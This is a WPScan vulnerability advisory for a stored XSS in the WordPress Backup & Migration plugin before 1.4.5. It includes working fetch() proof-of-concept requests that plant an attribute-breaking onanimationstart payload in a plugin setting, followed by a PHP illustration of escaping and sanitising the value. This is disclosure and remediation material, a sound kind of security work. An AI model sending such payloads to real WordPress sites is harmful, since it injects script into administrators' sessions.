Source: wpvulndb
Author: Krzysztof Zając (CERT PL)
WPVDB-ID: 7F935916-9A1A-40C7-B6D8-EFCC46EB8EAF
History: Nov 06, 2023 - 12:00 a.m.

WordPress Backup & Migration < 1.4.5 - Subscriber+ Stored XSS

Published: 2023-11-06 00:00:00
Author: Krzysztof Zając (CERT PL)
Source: wpscan.com
Tags: wordpress, backup, migration, subscriber, stored xss, security vulnerability

AI Score: 5.6 Medium (Confidence: High)
EPSS: 0.0004 Low (Percentile: 14.0%)

Description: The plugin does not sanitise and escape some parameters, which could allow users with a role as low as Subscriber to perform Cross-Site Scripting attacks. This was partially fixed in version 1.4.4, but that release still allowed XSS attacks from Admin users.

PoC

Run the following from a browser session logged in as a Subscriber (the stored value for im_db_file_per_req is the XSS payload):

    fetch("/wp-admin/admin-ajax.php", {
      "headers": {
        "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
      },
      "body": "settings_data%5Bim_data_size_per_req%5D=1&settings_data%5Bim_db_file_per_req%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert(%2FXSS%2F)+x&action=mgdp_plugin_save_import_settings",
      "method": "POST",
      "mode": "cors",
      "credentials": "include"
    });

Then the admin needs to click http://127.0.0.1:8001/wp-admin/admin.php?page=wp-migration-duplicator#wt-mgdp-import -> advanced options.

On version 1.4.4, a site admin must run the following command on the Backup & Migration page (the request now requires the page's import nonce):

    fetch("/wp-admin/admin-ajax.php", {
      "headers": {
        "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
      },
      "body": "settings_data%5Bim_data_size_per_req%5D=1&settings_data%5Bim_db_file_per_req%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert(%2FXSS%2F)+x&action=mgdp_plugin_save_import_settings&_wpnonce=" + wp_migration_duplicator_import.nonces.main,
      "method": "POST",
      "mode": "cors",
      "credentials": "include"
    });
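As an added illustration (not the plugin's code, which this advisory does not show): the stored value in the PoC opens with a double quote, so wherever it is echoed into an HTML attribute it terminates the attribute and the rest becomes a style plus an event handler. The plain-PHP sketch below shows the two defences the description names, sanitising the numeric setting on save and escaping it on output; it runs without WordPress, where the equivalents are absint() and esc_attr(), and the function names and the input's name attribute are hypothetical (the plugin's AJAX handler would additionally need a capability check and the nonce that the 1.4.4 PoC already has to supply).

```php
<?php
// Added example, not the plugin's code. Plain PHP so it runs stand-alone;
// in a WordPress plugin use absint() on save and esc_attr() on output.

// The value the advisory's PoC stores in im_db_file_per_req (URL-decoded).
$payload = '" style=animation-name:rotation onanimationstart=alert(/XSS/) x';

// Unsafe rendering: the stored value is concatenated straight into an
// attribute, so the leading quote ends value="..." and the remainder is
// parsed as new attributes on the <input> element.
function render_unsafe(string $value): string {
    return '<input name="settings_data[im_db_file_per_req]" value="' . $value . '">';
}

// Escaped on output: quotes and angle brackets become entities, so the whole
// string stays inside the attribute value (this is what esc_attr() does).
function render_escaped(string $value): string {
    $safe = htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input name="settings_data[im_db_file_per_req]" value="' . $safe . '">';
}

// Sanitised on save: a "files per request" setting is a positive integer, so
// anything non-numeric or non-positive is replaced by a default before it is
// stored (absint() plus a range check in WordPress terms). With this in place
// the markup never reaches the database, regardless of how it is later echoed.
function sanitize_per_req($raw, int $default = 1): int {
    if (!is_numeric($raw)) {
        return $default;
    }
    $n = (int) $raw;
    return $n > 0 ? $n : $default;
}

echo "Unsafe:    ", render_unsafe($payload), "\n";
echo "Escaped:   ", render_escaped($payload), "\n";
echo "Sanitised: ", sanitize_per_req($payload), "\n";
echo "Sanitised: ", sanitize_per_req("25"), "\n";
```

Both layers are needed: escaping on output protects every template that prints the setting, and sanitising on save keeps a later unescaped use from reintroducing the bug.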

CPE (Operator: eq, Version: 1.4.5)

